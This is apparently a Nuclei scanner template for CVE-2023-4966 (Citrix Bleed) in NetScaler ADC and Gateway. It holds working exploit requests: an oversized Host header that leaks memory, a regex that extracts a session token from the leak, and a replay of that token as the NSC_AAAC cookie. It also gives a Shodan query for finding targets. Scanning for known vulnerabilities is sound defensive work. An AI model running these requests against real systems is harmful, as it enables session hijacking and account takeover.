72 lines
2.3 KiB
YAML
72 lines
2.3 KiB
YAML
id: CVE-2023-4966
|
|
|
|
info:
|
|
name: Citrix Bleed - Leaking Session Tokens
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.
|
|
reference:
|
|
- https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py
|
|
- https://github.com/Chocapikk/CVE-2023-4966
|
|
- https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
|
|
- https://x.com/assetnote/status/1716757539323564196?s=20
|
|
- https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-4966
|
|
cwe-id: CWE-119,NVD-CWE-noinfo
|
|
epss-score: 0.92522
|
|
epss-percentile: 0.98793
|
|
cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
vendor: citrix
|
|
product: netscaler_application_delivery_controller
|
|
shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway"
|
|
tags: cve,cve2023,citrix,adc,info-leak,kev,exposure
|
|
variables:
|
|
payload: '{{repeat("a", 24812)}}'
|
|
str: "{{to_lower(rand_text_alpha(4))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
|
|
{{str}}: {{Hostname}}
|
|
Host: {{payload}}
|
|
|
|
- |+
|
|
POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: NSC_AAAC={{session}}
|
|
|
|
unsafe: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: session
|
|
part: body_1
|
|
group: 1
|
|
regex:
|
|
- '([a-f0-9]{100}45525d5f4f58455e445a4a42)'
|
|
internal: true
|
|
|
|
- type: regex
|
|
part: body_2
|
|
regex:
|
|
- '([a-z0-9._]+)'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'NSC_AAAC='
|
|
- 'HTTP/1.1'
|
|
|
|
- type: word
|
|
words:
|
|
- '{"issuer":'
|
|
# digest: 490a00463044022046f0ccfd2fde349604ed7fbc9481d9528fb726a7e5bdee7d33d412020341cc9e022020ecc3108f8eb470b3f7b059347ec48b83e479d41d383d49b16cd60817fb0ac6:922c64590222798bb761d5b6d8e72950 |